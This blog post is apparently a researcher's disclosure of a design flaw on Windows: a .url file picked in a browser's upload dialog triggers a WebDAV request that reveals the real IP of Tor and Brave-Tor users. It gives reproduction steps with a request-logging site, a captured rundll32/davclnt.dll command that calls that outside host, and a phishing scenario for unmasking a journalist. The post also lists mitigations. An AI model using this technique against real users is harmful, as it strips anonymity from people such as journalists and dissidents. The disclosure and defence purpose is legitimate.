Discover the real IP of a “Tor browser” user by exploiting a design flaw
Why did I publish this?
After disclosing this to the Tor project, I have gotten the response that this issue was already disclosed publicly three years ago and not dealt with.
From what I have seen, this issue is not popular in the web and frankly I haven’t found information on it until I have got a response from Tor project.
The old ticket: https://trac.torproject.org/projects/tor/ticket/18101
This issue is somewhat similar to “TorMoil” vulnerability from 2017.
I believe it is important to know about this technique in order to know better the possible risks and to raise awareness in general. Plus, I believe it is important to let vendors know that our privacy should be their highest concern and they need to fix such flaws.
Effected when used with the following browsers
Tor browser, Brave with Tor mode, Chrome, Firefox, Internet Explorer.
For some reason Edge browser is not effected.
When you see on a web page a button with a caption of “browse” to select a file for uploading — it is an HTML object that looks like this:
when a user selects a “url” file in an HTML page, something simple yet interesting happens that reveals his/hers true public IP address.
The privacy concern
When someone posts a comment on social media, surfs to the political opposition’s forum, his/her public IP address can be logged on the web site database.
One of the ways for a government entity to spy on citizens is to view the domain name resolution requests or encrypted traffic and see what the user is doing.
One of the option that a user that wants to stay anonymous has is to use a browser that makes the DNS resolutions through Tor network and surfs through the Tor network. Because the connection to the Tor network is encrypted, this gives the user the ability to stay anonymous when surfing through the internet and no one can identify the users real public IP.
The real users public IP gives the ability to find the real person that surfs the web and a browser that uses Tor protects the user from such actions. Such people may be journalists, citizens, terrorists, malware authors and more.
The flaw explained
In order to reproduce the flaw, I will be using a cool website called “webhook.site” that generates a unique URI and records any HTML request that is made to this web page, including the IP address and requested HEADERS. The site author: https://twitter.com/fredsted
Next, we will create a simple URL file from the unique link that we got:
We will open the Tor prowser and check what is our IP through the Tor browser.
We will go to any web site that gives us the ability to chose a file for upload. For example: https://www.w3schools.com/jsref/tryit.asp?filename=tryjsref_fileupload_create
Immediately After we chose our new file “CouponCode.url” we will see a new request that was recorded on webhook.site:
What we can see now is our real public IP — 21.xxx.xxx.xx3 and not the Tor public IP which is 126.96.36.199.
So what just happened???? ( A bit technical )
Basically when a READ if a URL file was performed from the browser, a service has triggered windows process to make a WEBDAV request. “Web Distributed Authoring and Versioning” is a legacy windows file transfer protocol over HTTP that is still used today. more info on WEBDAV: https://www.comparitech.com/net-admin/webdav/
When we look at the TCP connections using netstat while reproducing this test, we can see the svchost.exe process suddenly connecting to the same web site.
If we look at the processes using procmon.exe we can see the following events:
First we see this event:
user: NT AUTHORITY\LOCAL SERVICE
services.exe calls ==>
C:\WINDOWS\system32\svchost.exe -k LocalService -p -s WebClient
Process is created:
rundll32.exe C:\WINDOWS\system32\davclnt.dll,DavSetCookie webhook.site@SSL https://webhook.site/
That we see this:
Lets look at the following line and take it appart:
\\anywebsite = The URL of a file share
@SSL = makes WEBDAV to use SSL\TLS with default port 443
DavWWWRoot = Forces the connection to be made using WEBDAV
75c8376e-xxxx–xxxx-xxxx-xxxxxxxa613c = the URI
So, why should I care? (Attack scenarios)
Presumably I work for the government and I know an email of a journalist that is fighting for human rights in a very censored and dark dictatorship. I would like to find out the journalists true identity in order to execute him for treason and find his contacts that are leaking sensitive information. But, unfortunately this journalist is using the Tor browser or Brave with Tor and I am very frustrated.
I can send him a phishing email with a .url like to a new domain. In this email I will write to him something like: upload this coupon file to google cloud in order to get free 1 year subscription. Or maybe something like: upload this coupon code to “GLEB Premium VPN” in order to bypass government censorship, deal will end in the next 12 hours.
As soon as the journalist tries to upload this URL file — I will find the real public IP of the traitor!
What can be done?
Today there are many solutions that can help with anonymity but those should be chosen with considering their security risks. Yes, “secure” solutions may be a risk themselves.
For example: your VPN provider may leak your info, your browser may have a bug and so on…
Some of the recommendations that I can give to boost your privacy:
- Use a full VPN together with tor browser or a SOCKS proxy.
- Use Tor proxy solutions like “oniongw” or “whonix gateway”. http://oniongw.ibsoft.com.gr/ or https://www.whonix.org/download/
- Use DNS over HTTPS for name resolution encryption on all services.
- Use a “privacy operating system” like Tails. https://tails.boum.org/
In any way — you should always check your settings. For example: move Tor browser to “safest” in order to block most scripts that can be leveraged against you as in the default configuration you are not very safe.